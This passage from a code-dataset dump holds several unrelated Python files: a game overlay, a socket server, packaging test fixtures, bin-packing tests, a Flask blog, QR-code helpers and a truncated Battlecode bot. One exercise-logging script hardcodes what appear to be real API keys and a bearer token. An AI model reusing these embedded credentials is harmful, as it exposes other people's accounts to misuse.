\"#ffcccb\"\nconfig_path = str(Path.home() / 'Documents') + r\"/RMBestFriend/Configs/\"\n\ndef center_window(window, min_width, min_height):\n # Get the screen width and height\n screen_width = window.winfo_screenwidth()\n screen_height = window.winfo_screenheight()\n\n # Calculate the x and y coordinates for centering\n x = (screen_width - min_width) // 2\n y = (screen_height - min_height) // 2\n\n # Set the window's geometry to center it on the screen\n window.geometry(f\"{min_width}x{min_height}+{x}+{y}\")\n\n\ndef save_coordinates(cor_x, cor_y, e_x, e_y):\n if not os.path.exists(config_path):\n os.makedirs(config_path)\n\n with open(config_path + r\"/coordinates.txt\", \"w\") as file:\n file.write(f\"Start X: {cor_x}\\n\")\n file.write(f\"Start Y: {cor_y}\\n\")\n file.write(f\"End X: {e_x}\\n\")\n file.write(f\"End Y: {e_y}\\n\")\n\n\ndef load_coordinates():\n try:\n with open(config_path + r\"/coordinates.txt\", \"r\") as file:\n lines = file.readlines()\n cor_x = float(lines[0].split(\":\")[1].strip())\n cor_y = float(lines[1].split(\":\")[1].strip())\n e_x = float(lines[2].split(\":\")[1].strip())\n e_y = float(lines[3].split(\":\")[1].strip())\n\n return cor_x, cor_y, e_x, e_y\n except FileNotFoundError:\n return None, None, None, None\n\n\nroot = tk.Tk()\nroot.title(\"RM Best Friend\")\nroot.attributes(\"-alpha\", 0.75)\nroot.attributes(\"-topmost\", True)\n#root.iconbitmap(\"icon.ico\")\nroot.state(\"zoomed\")\n\nframe = tk.Frame(root)\nframe.pack(side=tk.LEFT, fill=tk.Y)\n\n# Define a bold font\nbold_font = (\"Arial\", 12, \"bold\")\n\n# Create three labels\nlabel1 = tk.Label(frame, text=\"HP Detection: -\", width=15, font=bold_font, anchor=\"w\")\nlabel2 = tk.Label(frame, text=\"Buffer: -\", width=15, font=bold_font, anchor=\"w\")\nlabel3 = tk.Label(frame, text=\"GT Buffer: -\", width=15, font=bold_font, anchor=\"w\")\n\n# Pack the labels to display them in the window\nlabel1.pack(side=tk.TOP)\nlabel2.pack(side=tk.TOP)\nlabel3.pack(side=tk.TOP)\n\nmenu_bar = Menu(root)\nroot.config(menu=menu_bar)\n\nfile_menu = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label=\"Menu\", menu=file_menu)\n#file_menu.add_command(label=\"Keys setup\", command=keys_setup_window)\ncanvas = tk.Canvas(root, cursor=\"cross\")\ncanvas.pack(fill=tk.BOTH, expand=True)\n\nrect = None\n\n(start_x, start_y, end_x, end_y) = load_coordinates()\n\n# canvas.bind(\"\", on_press)\n# canvas.bind(\"\", on_drag)\n# canvas.bind(\"\", on_release)\n\nif start_x:\n rect = canvas.create_rectangle(start_x,\n start_y,\n end_x,\n end_y,\n fill=rect_color)\n\nroot.mainloop()","repo_name":"ValentinN94/FlyffUHardcore","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35961172015","text":"\"\"\"\n@version: 3.9\n@title: socket 服务端程序\n\n# 关闭客户端连接\n# 关闭一半或全部的连接。如果 how 为 SHUT_RD,则后续不再允许接收。\n# 如果 how 为 SHUT_WR,则后续不再允许发送。\n# 如果 how 为 SHUT_RDWR,则后续的发送和接收都不允许。\n\"\"\"\n\nfrom typing import Tuple\nimport socket\n\n\nclass SocketServerClient:\n \"\"\"\n socket 基础echo服务器\n \"\"\"\n\n def __init__(self, address: Tuple):\n self.address = address\n\n @classmethod\n def _base_handler(cls, client_socket):\n requestData = client_socket.recv(1024)\n if requestData:\n # 构造响应数据\n response_start_line = \"HTTP/1.1 200 OK\\r\\n\"\n response_headers = \"Server: My server\\r\\n\"\n response_body = \"
Python HTTP Test
\"\n response = response_start_line + response_headers + \"\\r\\n\" + response_body\n\n # 向客户端返回响应数据\n client_socket.send(bytes(response, \"utf-8\"))\n else:\n client_socket.shutdown(socket.SHUT_RDWR)\n client_socket.close()\n\n def serve_forever(self):\n serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n serverSocket.bind(self.address)\n serverSocket.listen(128)\n while True:\n clientSocket, clientAddress = serverSocket.accept()\n self._base_handler(clientSocket)\n","repo_name":"qianniaoge/handbook","sub_path":"Python/scripts/server/tcp_socket_server.py","file_name":"tcp_socket_server.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12457808047","text":"import os\nimport pathlib as pl\nimport subprocess\nimport http.server\nimport socketserver\nimport threading\nimport time\n\nimport pytest\n\nfrom agent_build_refactored.utils.constants import (\n AGENT_VERSION,\n SOURCE_ROOT,\n CpuArch,\n)\nfrom agent_build_refactored.managed_packages.managed_packages_builders import (\n ALL_PACKAGE_BUILDERS,\n AGENT_AIO_PACKAGE_NAME,\n AGENT_NON_AIO_AIO_PACKAGE_NAME,\n)\nfrom tests.end_to_end_tests.managed_packages_tests.remote_machine_tests.tools import (\n create_packages_repo_root,\n get_packages_stable_version,\n is_builder_creates_aio_package,\n)\n\nfrom tests.end_to_end_tests.run_in_remote_machine import DISTROS\n\n\nIN_REMOTE_MACHINE = bool(os.environ.get(\"IN_REMOTE_MACHINE\"))\n\n\ndef add_cmd_args(parser, is_pytest_parser: bool):\n\n if is_pytest_parser:\n add_func = parser.addoption\n else:\n add_func = parser.add_argument\n\n add_func(\"--builder-name\", dest=\"builder_name\", required=True)\n\n add_func(\n \"--package-type\",\n dest=\"package_type\",\n required=True,\n choices=[\"deb\", \"rpm\"],\n help=\"Type of the package to test\",\n )\n\n add_func(\n \"--packages-source\",\n dest=\"packages_source\",\n required=False,\n help=\"Depending on the '--packages-source-type' option, directory or repo tarball with packages to test. \"\n \"If not specified, packages will be built inplace.\",\n )\n\n add_func(\n \"--packages-source-type\",\n dest=\"packages_source_type\",\n choices=[\"dir\", \"repo-tarball\"],\n default=\"dir\",\n required=False,\n )\n\n add_func(\n \"--remote-machine-type\",\n required=True,\n choices=[\"ec2\", \"docker\"],\n help=\"Type of the remote machine for the test. 
For 'ec2' - run in AWS ec2 instance,\"\n \"'docker' - run in docker container, 'local', run locally.\",\n )\n\n add_func(\n \"--stable-packages-version\",\n dest=\"stable_packages_version\",\n required=False,\n help=\"Version of the latest stable version of package.\",\n )\n\n add_func(\n \"--distro-name\",\n dest=\"distro_name\",\n required=True,\n choices=DISTROS.keys(),\n help=\"Distribution to test.\",\n )\n\n\ndef pytest_collection_modifyitems(config, items):\n if IN_REMOTE_MACHINE:\n return\n\n skip = pytest.mark.skip(\n reason=\"This test is only supposed to be run in a remote machine(docker or ec2)\"\n )\n for item in items:\n item.add_marker(skip)\n\n\ndef pytest_addoption(parser):\n if IN_REMOTE_MACHINE:\n add_cmd_args(parser, is_pytest_parser=True)\n\n\n@pytest.fixture(scope=\"session\")\ndef package_builder_name(request):\n \"\"\"Name of the builder that build tested packages.\"\"\"\n return request.config.option.builder_name\n\n\n@pytest.fixture(scope=\"session\")\ndef package_builder(package_builder_name):\n \"\"\"Builder class that builds tested packges.\"\"\"\n return ALL_PACKAGE_BUILDERS[package_builder_name]\n\n\n@pytest.fixture(scope=\"session\")\ndef package_type(request):\n return request.config.option.package_type\n\n\n@pytest.fixture(scope=\"session\")\ndef remote_machine_type(request):\n \"\"\"\n Fixture with time of the remote machine where tests can run. For now that's ec2 or docker.\n \"\"\"\n return request.config.option.remote_machine_type\n\n\n@pytest.fixture(scope=\"session\")\ndef distro_name(request):\n return request.config.option.distro_name\n\n\n@pytest.fixture(scope=\"session\")\ndef target_distro(distro_name):\n return DISTROS[distro_name]\n\n\n@pytest.fixture(scope=\"session\")\ndef use_aio_package(package_builder_name):\n \"\"\"Fixture flag that tells that a tested package is AIO\"\"\"\n return is_builder_creates_aio_package(package_builder_name=package_builder_name)\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_package_name(use_aio_package):\n if use_aio_package:\n return AGENT_AIO_PACKAGE_NAME\n else:\n return AGENT_NON_AIO_AIO_PACKAGE_NAME\n\n\n@pytest.fixture(scope=\"session\")\ndef stable_packages_version(request):\n return get_packages_stable_version(\n version=request.config.option.stable_packages_version\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef packages_repo_root(\n request, tmp_path_factory, package_builder, stable_packages_version, package_type\n):\n \"\"\"\n Root directory which is served by the mock web server.\n The mock repo is located in ./repo folder, the public key is located in ./repo_public_key.gpg\n :return:\n \"\"\"\n\n return create_packages_repo_root(\n packages_source_type=request.config.option.packages_source_type,\n packages_source=request.config.option.packages_source,\n package_builder=package_builder,\n package_type=package_type,\n stable_packages_version=stable_packages_version,\n output_dir=tmp_path_factory.mktemp(\"packages_repo_root\"),\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_root(packages_repo_root):\n \"\"\"Root directory of the mock repository.\"\"\"\n return packages_repo_root / \"repo\"\n\n\n@pytest.fixture(scope=\"session\")\ndef server_url(packages_repo_root):\n \"\"\"\n This fixture prepares http server with package repository and other needed files.\n \"\"\"\n\n # Create web server which serves repo and public key file.\n class Handler(http.server.SimpleHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, directory=str(packages_repo_root), 
**kwargs)\n\n with socketserver.TCPServer((\"\", 0), Handler) as httpd:\n repo_server_thread = threading.Thread(target=httpd.serve_forever)\n repo_server_thread.start()\n\n time.sleep(1)\n\n yield f\"http://localhost:{httpd.socket.getsockname()[1]}\"\n\n httpd.shutdown()\n repo_server_thread.join()\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_url(server_url):\n \"\"\"Url to package repository\"\"\"\n\n return f\"{server_url}/repo\"\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_public_key_url(server_url):\n return f\"{server_url}/repo_public_key.gpg\"\n\n\n@pytest.fixture(scope=\"session\")\ndef convenience_script_path(\n server_url, repo_url, repo_public_key_url, tmp_path_factory\n):\n \"\"\"\n Path to the convenience install script.\n We also start web server that serves mock repo with packages that have to be installed by the\n convenience script.\n \"\"\"\n\n # Build convenience script with current repo and public key urls.\n render_install_script_path = (\n SOURCE_ROOT\n / \"agent_build_refactored/managed_packages/convenience_install_script/render_install_agent_script.sh\"\n )\n\n install_script_path = (\n tmp_path_factory.mktemp(\"install_script\") / \"install-scalyr-agent-2.sh\"\n )\n\n subprocess.run(\n [\n \"bash\",\n str(render_install_script_path),\n repo_url,\n repo_url,\n repo_public_key_url,\n str(install_script_path),\n ],\n check=True,\n )\n\n yield install_script_path\n\n\ndef _get_package_path_from_repo(\n package_filename_glob: str, package_type: str, repo_root: pl.Path\n):\n \"\"\"Helper function that finds package inside repo root.\"\"\"\n if package_type == \"deb\":\n packages_dir = repo_root / \"pool/main/s\"\n elif package_type == \"rpm\":\n packages_dir = repo_root\n else:\n raise Exception(f\"Unknown package type: '{package_type}'\")\n\n found = list(packages_dir.rglob(package_filename_glob))\n assert len(found) == 1\n return found[0]\n\n\ndef _arch_to_package_arch(package_type: str, arch: CpuArch = None):\n if package_type == \"deb\":\n mapping = {\n CpuArch.x86_64: \"amd64\",\n CpuArch.AARCH64: \"arm64\",\n None: \"all\",\n }\n return mapping[arch]\n\n if package_type == \"rpm\":\n mapping = {\n CpuArch.x86_64: \"x86_64\",\n CpuArch.AARCH64: \"aarch64\",\n None: \"noarch\",\n }\n return mapping[arch]\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_package_path(\n repo_root,\n package_builder,\n agent_package_name,\n use_aio_package,\n package_type,\n):\n if repo_root is None:\n return None\n\n if use_aio_package:\n package_arch = _arch_to_package_arch(\n package_type=package_type,\n arch=package_builder.ARCHITECTURE,\n )\n else:\n package_arch = _arch_to_package_arch(\n package_type=package_type,\n arch=None,\n )\n\n if package_type == \"deb\":\n package_filename_glob = (\n f\"{agent_package_name}_{AGENT_VERSION}_{package_arch}.{package_type}\"\n )\n elif package_type == \"rpm\":\n package_filename_glob = (\n f\"{agent_package_name}-{AGENT_VERSION}-1.{package_arch}.{package_type}\"\n )\n else:\n raise Exception(f\"Unknown package type: {package_type}\")\n\n return _get_package_path_from_repo(\n package_filename_glob=package_filename_glob,\n package_type=package_type,\n repo_root=repo_root,\n )\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/end_to_end_tests/managed_packages_tests/remote_machine_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"12307738393","text":"# tests_random.py\n# This script 
tries to determine the cause of errors that don't seem to be\n# contained in one module. It works with Python 3\n\nimport binpacking_dynamic as bp\nimport coolcookies\nimport mooproblem\nimport numpy as np\nimport unittest\nimport pickle\nfrom binpacking_dynamic import coordarrays\nfrom solutions_dynamic import MultiSol\n\n\n@unittest.skip('Focus on another')\nclass Tests(unittest.TestCase):\n\n    def setUp(self):\n        n = 1000\n        cookies = coolcookies.makeobjects(n, 100, 'tests/Cookies1000.txt')\n        self.moop = mooproblem.MOCookieProblem(n, 24, 300, 8, cookies)\n\n    def test_coordarrays2(self):\n        # Set up\n        with open('tests/solution597.pkl', 'rb') as input:\n            solution = pickle.load(input)\n        for i in range(solution.openbins):\n            print(i, solution.vlrep[i])\n        coordarrays(solution)\n        mooproblem.checkformismatch(solution)\n        fitvals = self.moop.calcfits(solution)\n        self.assertEqual(len(fitvals), 3)\n\n\nclass FixTfillLoopTests(unittest.TestCase):\n\n    def setUp(self):\n        n = 1000\n        batchsize = 100\n        boxcap = 24\n        rackcap = 300\n        fillcap = 8\n        cookies = coolcookies.makeobjects(n, batchsize, 'tests/Cookies1000.txt')\n        self.moop = mooproblem.MOCookieProblem(n, boxcap, rackcap, fillcap, cookies)\n        with open('tests/solution143.pkl', 'rb') as input:\n            self.solution = pickle.load(input)\n        self.solution = self.check_sol_for_rack_violations(self.solution)\n\n    @unittest.skip('too much output')\n    def test_fix_infinite_loop_fix_tfill(self):\n        violations = self.moop.period_fill_limit(self.solution)\n        sol = self.moop.fix_tfill(violations, self.solution)\n        self.assertEqual(sol.getopenbins(), len(sol.getvlrep()))\n        rcl_tfill = self.moop.get_move_restrictions(sol)\n        for tk in range(len(rcl_tfill.res_fill)):\n            self.assertGreaterEqual(rcl_tfill.res_fill[tk], 0)\n\n    @unittest.skip('too much output')\n    def test_fix_infinite_loop_all_earlier_boxes_full(self):\n        violations = self.moop.period_fill_limit(self.solution)\n        rcl_tfill = self.moop.get_move_restrictions(self.solution)\n        sol, rcl_tfill = self.moop.select_fix_mode(0, violations,\n                                                   rcl_tfill, self.solution)\n        violations = self.moop.period_fill_limit(sol)\n        sol, rcl_tfill = self.moop.open_colderbox(violations[0], rcl_tfill, sol)\n        inew = sol.getopenbins() - 1\n        j = sol.vlrep[inew][0]\n        tmin = self.moop.cookies.get(j).getbatch() * 600\n        self.assertTrue(rcl_tfill.time_feasible(sol.tfill[inew], tmin))\n\n    @unittest.skip('too much output')\n    def test_fix_open_colderbox(self):\n        with open('tests/solution836.pkl', 'rb') as input:\n            sol836 = pickle.load(input)\n        sol836 = self.check_sol_for_rack_violations(sol836)\n        violations = self.moop.period_fill_limit(sol836)\n        rcl_tfill = self.moop.get_move_restrictions(sol836)\n        for loop in range(3):\n            sol836, rcl_tfill = self.moop.select_fix_mode(loop, violations,\n                                                          rcl_tfill, sol836)\n            violations = self.moop.period_fill_limit(sol836)\n            if violations:\n                sol836, rcl_tfill = \\\n                    self.moop.open_colderbox(violations[0], rcl_tfill, sol836)\n        rviolations = self.moop.rackcapacity(sol836.getx(), sol836.gettfill())\n        self.assertListEqual(rviolations, [])\n\n    @unittest.skip('too much output')\n    def test_fix_infinite_loop_boxes_not_combining(self):\n        with open('tests/solution555.pkl', 'rb') as input:\n            sol555 = pickle.load(input)\n        sol555 = self.check_sol_for_rack_violations(sol555)\n        violations = self.moop.period_fill_limit(sol555)\n        ran_correctly = True\n        try:\n            sol555 = self.moop.fix_tfill(violations, sol555)\n        except KeyboardInterrupt:\n            ran_correctly = False\n        self.assertTrue(ran_correctly)\n\n    @unittest.skip('too much output')\n    def 
test_fix_problem_with_adapt_movebins(self):\n with open('tests/sol_14349.pkl', 'rb') as input:\n sol14349 = pickle.load(input)\n sol14349 = self.check_sol_for_rack_violations(sol14349)\n violations = self.moop.period_fill_limit(sol14349)\n self.moop.fix_tfill(violations, sol14349)\n\n @unittest.skip('too much output')\n def test_fix_no_options_at_5400(self):\n with open('tests/momasol_13263.pkl', 'rb') as input:\n sol13263 = pickle.load(input)\n sol13263 = self.check_sol_for_rack_violations(sol13263)\n violations = self.moop.period_fill_limit(sol13263)\n sol13263 = self.moop.fix_tfill(violations, sol13263)\n violations = self.moop.period_fill_limit(sol13263)\n self.assertFalse(violations)\n\n def test_fix_remove_hot_cookies(self):\n with open('tests/momasol_9931.pkl', 'rb') as input:\n sol9931 = pickle.load(input)\n sol9931 = self.check_sol_for_rack_violations(sol9931)\n\n def check_sol_for_rack_violations(self, sol):\n # sol is an instance of a solution class\n rackviolations = self.moop.rackcapacity(sol.getx(), sol.gettfill())\n # We can fix cooling rack violations:\n if rackviolations:\n self.moop.fixcoolingrack(rackviolations, sol)\n return sol\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kyspencer/GAMMA-PC-A-Greedy-Memetic-Algorithm-for-Storing-Cooling-Objects","sub_path":"SampleScripts/tests/tests_random.py","file_name":"tests_random.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660036229","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import defaultdict\nimport sys\nn, m = map(int, sys.stdin.readline().split())\n\narr = []\nfor _ in range(n) :\n word = sys.stdin.readline().rstrip()\n arr.append(word)\n \nfor i in range(m) :\n find = sys.stdin.readline().rstrip()\n if find not in arr :\n print(-1)\n else :\n for j in range(n) :\n if arr[j] == find :\n print(j+1, end=' ')\n print()","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/ETC/Defaultdict_Tutorial.py","file_name":"Defaultdict_Tutorial.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45383332876","text":"\"\"\" provides functions to extract, read, and compare qr codes\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport pyzbar.pyzbar as pyzbar\n\n\ndef crop_qr_code(frame):\n \"\"\"crops a qr code from an image and returns it binarized\n\n :param frame: the image\n :type frame: numpy.ndarray\n :return: cropped and binarized qr code\n :rtype: numpy.ndarray\n \"\"\"\n barcode = pyzbar.decode(frame, symbols=[pyzbar.ZBarSymbol.QRCODE])\n retval = None\n if barcode:\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = frame[:, :, 0]\n\n # Only check first recognized barcode\n qpoints = np.asarray(barcode[0].polygon)\n pts1 = np.float32([qpoints[0], qpoints[3], qpoints[1], qpoints[2]])\n pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])\n M = cv2.getPerspectiveTransform(pts1, pts2)\n dst = cv2.warpPerspective(gray, M, (300, 300))\n ret3, th = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n retval = th\n\n return retval\n\n\ndef read_qr_code(qrcode_frame):\n \"\"\"reads a qr code image and returns its decoded information\n\n :param qrcode_frame: image of a qr code\n :return: decoded string\n :type: qrcode_frame: numpy.ndarray\n :rtype: String\n \"\"\"\n\n barcode = pyzbar.decode(qrcode_frame)\n retval = None\n\n 
if barcode:\n        # Handle encoding errors: https://sourceforge.net/p/zbar/discussion/664596/thread/ed7aca9d/#e9bf\n        try:\n            retval = barcode[0].data.decode(\"ascii\")\n        except UnicodeDecodeError:\n            retval = barcode[0].data.decode(\"utf-8\").encode(\"sjis\").decode('utf-8')\n\n    return retval\n\n\ndef qr_codes_equal(qr1, qr2):\n    \"\"\"checks if two qr codes are equal\n\n    :param qr1: image of first qr code\n    :param qr2: image of second qr code\n    :return: True if equal, False if not\n    :rtype: bool\n    \"\"\"\n\n    if qr1 is None or qr2 is None:\n        return False\n    else:\n        string1 = read_qr_code(qr1)\n        string2 = read_qr_code(qr2)\n\n        return bool(string1 and string2 and string1.strip() == string2.strip())\n","repo_name":"iswunistuttgart/ITArchSoCLib","sub_path":"lib/QRScanner.py","file_name":"QRScanner.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"29926369520","text":"# adding imports\nimport os\nimport sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, render_template, abort, flash\n\n# constant\nSQL_FILE = 'schema.sql'\n\n# initializing app\napp = Flask(__name__)\n\n#configuration\napp.config.update(dict(\n    DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n    DEBUG=True,\n    SECRET_KEY='development key',\n    USERNAME='admin',\n    PASSWORD='default'\n))\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n# basic endpoint\n@app.route('/hello')\ndef hello_world():\n    return 'Hello World!'\n\ndef init_db():\n    \"\"\"Initializes DB\"\"\"\n    with app.app_context():\n        db = get_db()\n        with app.open_resource(SQL_FILE,mode='r') as f:\n            db.cursor().executescript(f.read())\n        db.commit()\n\ndef connect_db():\n    \"\"\"Connects to the specific database.\"\"\"\n    rv = sqlite3.connect(app.config['DATABASE'])\n    rv.row_factory = sqlite3.Row\n    return rv\n\ndef get_db():\n    \"\"\"\n    Opens database connection in application context if it does not already exist\n    \"\"\"\n    if not hasattr(g,'sqlite_db'):\n        g.sqlite_db = connect_db()\n    return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db(error):\n    \"\"\"\n    Closes the database connection after the completion of a request\n    \"\"\"\n    if hasattr(g,'sqlite_db'):\n        g.sqlite_db.close()\n\n@app.route(\"/\")\ndef show_entries():\n    db = get_db()\n    cur = db.execute('select title,text from entries order by id desc')\n    entries = cur.fetchall()\n    return render_template('show_entries.html',entries=entries)\n\n@app.route('/add',methods=['POST'])\ndef add_entry():\n    if not session.get('logged_in'):\n        abort(401)\n    db = get_db()\n    db.execute('insert into entries(text,title) values (?,?)',[request.form['text'],request.form['title']])\n    db.commit()\n    flash('New entry was successfully posted')\n    return redirect(url_for('show_entries'))\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"voidabhi/flask","sub_path":"Flaskr/Flaskr.py","file_name":"Flaskr.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"21635905271","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 18 10:58:49 2017\n\n@author: tomislav\n\"\"\"\n\nimport cv2\n\n\ndef resize(img, scaleFactor):\n    return cv2.resize(img, (int(img.shape[1]*(1/scaleFactor)),\n                            int(img.shape[0]*(1/scaleFactor))),\n                      interpolation=cv2.INTER_AREA)\n\n\ndef pyramid(image, scale=1.5, minSize=(500, 300)):\n    yield image\n\n    while True:\n        image = resize(image, scale)\n        if image.shape[0] < minSize[1] or 
image.shape[1] < minSize[0]:\n break\n yield image\n","repo_name":"tbazina/injection-moulding-products-detection-and-recognition","sub_path":"obj_detector/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"798691832","text":"from django.test import TestCase, tag\nfrom game.models import Game, Board\nfrom tests.common.constants import BOARD_FIELDS_EXPECTED, FIELD_EMPTY_VAL\n\n\nclass MyTestCase(TestCase):\n @tag('enabled')\n def test_board_default_state(self):\n board = Board()\n\n field_emptiness_statuses = {\n field_name: board.check_if_field_is_empty(field=field_name) for field_name in BOARD_FIELDS_EXPECTED\n }\n self.assertNotIn(\n False, field_emptiness_statuses.values(),\n f\"in default state not all Board fields values were reported as empty:\"\n f\"reported: {field_emptiness_statuses}\"\n )\n\n for _field_name in BOARD_FIELDS_EXPECTED:\n _field_val = getattr(board, _field_name)\n self.assertEqual(\n _field_val, FIELD_EMPTY_VAL,\n f\"Board in default state reported a non-empty `{_field_name}` value:\"\n f\"reported: {_field_val}, expected: {FIELD_EMPTY_VAL}\"\n )\n \n self.assertEqual(\n board.check_if_board_is_full(), (False, 0),\n \"Board in default state reported to be full\"\n )\n\n self.assertFalse(board.win_board(), \"Board in default state reported win condition as met\")\n\n self.assertFalse(\n board.end_game,\n f\"Board in default state reported game end condition to be True - `end_game`={board.end_game}\"\n )\n\n self.assertFalse(\n board.last_move,\n f\"Board in default state reported last move dump as populated - `last_move`={board.last_move}\"\n )\n\n self.assertIsNone(\n board.game,\n f\"Board in default state reported game as populated - `game`={board.game}\"\n )\n\n # game_time = board.get_game_time()\n # self.assertEquals(\n # game_time, 0,\n # f\"Board in default state reported non-0 game time: {game_time}\"\n # )\n\n # @tag('enabled')\n def test_game_default_state(self):\n pass","repo_name":"infoshareacademy/jpydzr1-dkmap-django","sub_path":"tests/test_game/test_game_models.py","file_name":"test_game_models.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38656640783","text":"t = int(input())\ndef dfs(x, level):\n global ans\n if level > ans :\n ans = level\n return\n for i in graph[x]:\n if not visited[i]:\n visited[i] = 1\n dfs(i, level+1)\n visited[i] = 0\n\nfor tc in range(1, t + 1):\n n,m = map(int,input().split())\n if m == 0:\n print('#{} {}'.format(tc, 0))\n else:\n v = [list(map(int, input().split())) for _ in range(m)]\n graph = [[] for i in range(n+1)]\n ans = -1\n for i in range(m):\n a,b = v[i]\n graph[a].append(b)\n graph[b].append(a)\n for i in range(1,n+1):\n visited = [0] * (n+1)\n dfs(i, 0)\n print('#{} {}'.format(tc, ans))\n\n\n\n","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D3/2814. 
최장 경로/최장 경로.py","file_name":"최장 경로.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30049219132","text":"import logging\nimport os\nfrom os import path\n\nSCRIPT_PATH = path.dirname(path.abspath(__file__))\n\nLOGS_PATH = path.join(SCRIPT_PATH, \"logs\")\nif not path.exists(LOGS_PATH):\n    os.makedirs(LOGS_PATH, exist_ok=True)\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.INFO)\nfile_handler = logging.FileHandler(path.join(LOGS_PATH, \"fv.log\"))\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\")\nfile_handler.setFormatter(formatter)\nLOGGER.addHandler(file_handler)","repo_name":"AntoineDona/Connect4","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"21238403826","text":"import requests\nimport datetime\n\njson = {\n    \"x-app-id\": \"287c85c7\",\n    \"x-app-key\": \"5a50f94763fb437309102af392c30a03\",\n    \"Content-Type\": \"application/json\"\n}\n\njson1 = {\n    \"query\": input(\"What did you do today: \"),\n    \"gender\": \"male\",\n    \"weight_kg\": 81,\n    \"height_cm\": 183,\n    \"age\": 20\n}\n\ndate = datetime.date.today()\ntime = str(datetime.datetime.now().hour) + \":\" + str(datetime.datetime.now().minute) + \":\" + str(datetime.datetime.now().second)\na = requests.post(\"https://trackapi.nutritionix.com/v2/natural/exercise\", json = json1, headers=json)\nsheet_inputs = {\n    \"sheet1\": {\n        \"date\": str(date),\n        \"time\": str(time),\n        \"exercise\": a.json()[\"exercises\"][0][\"user_input\"],\n        \"duration\": str(a.json()[\"exercises\"][0][\"duration_min\"]),\n        \"calories\": str(a.json()[\"exercises\"][0][\"nf_calories\"]),\n    }\n    }\nrequests.post(\"https://api.sheety.co/e727c248aeb3c57bae687178bfc5a928/untitledSpreadsheet/sheet1\", json = sheet_inputs, headers = {\"Authorization\": \"Bearer Ksfaq137\"})","repo_name":"Townsend0/habit-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42121460393","text":"# missing functions\r\n# * ATTACK ... 
in General\r\n# * BLINK\r\n\r\nimport battlecode as bc\r\nimport random\r\nimport traceback\r\nfrom datetime import datetime\r\n\r\ngc = bc.GameController()\r\ndirections = list(bc.Direction)\r\nmy_team = gc.team()\r\nenemy_team = bc.Team.Red\r\nif my_team == bc.Team.Red:\r\n\tenemy_team = bc.Team.Blue\r\nrandom.seed(datetime.now())\r\n\r\nclass MageClass(object):\r\n\r\n\tdef __init__(self):\r\n\t\tself.marsMap = bc.GameMap.mars_map\r\n\t\tself.earthMap = bc.GameMap.earth_map\r\n\t\t\r\n\t\tself.marsHeight = self.marsMap.height\r\n\t\tself.marsWidth = self.marsMap.width\r\n\t\t\r\n\t\tself.earthHeight = self.earthMap.height\r\n\t\tself.earthWidth = self.earthMap.width\r\n\t\t\r\n\t\tself.NUMBER_OF_GUESSES = 5\r\n\r\n\tdef blink_attack_mars(self, unit):\r\n\t\tif not gc.is_blink_ready(unit.id):\r\n\t\t\treturn\r\n\t\tif bc.ResearchInfo.get_level(bc.UnitType.Mage) < 4:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tlocation = unit.location\r\n\t\t\t\r\n\t\tpossible_targets = gc.sense_nearby_units_by_team(location.map_location(), 2, 